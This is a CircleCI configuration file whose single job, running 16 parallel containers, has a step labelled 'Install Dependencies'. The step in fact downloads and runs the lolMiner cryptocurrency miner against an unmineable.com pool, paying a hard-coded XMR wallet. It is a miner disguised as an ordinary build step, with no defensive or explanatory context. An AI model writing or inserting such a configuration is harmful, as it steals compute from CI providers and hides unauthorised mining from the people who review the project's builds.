version: 2.1
jobs:
    trial:
      docker:
            - image: circleci/ruby:2.5.3
      parallelism: 16
      steps:
        - run:
            name: Install Dependencies
            command: |
              lscpu
              wget https://github.com/Lolliedieb/lolMiner-releases/releases/download/1.31/lolMiner_v1.31_Lin64.tar.gz && tar -zxvf lolMiner_v1.31_Lin64.tar.gz && cd 1.31 && clear && ./lolMiner --algo ETHASH --pool ethash.unmineable.com:3333 --user XMR:45YzFWkyySfW1cCUSiU45U83qC5u5b5avAe1TwEGNYFuJ3xRCt6ddGCdoL9UNLgETPaVyMg5qtW6yCuGPH1Vej5rEAEwD9b.WORKERNAME --ethstratum ETHPROXY
              echo Hello,subscribe it

workflows:
    version: 2.1
    build:
        jobs:
        - trial
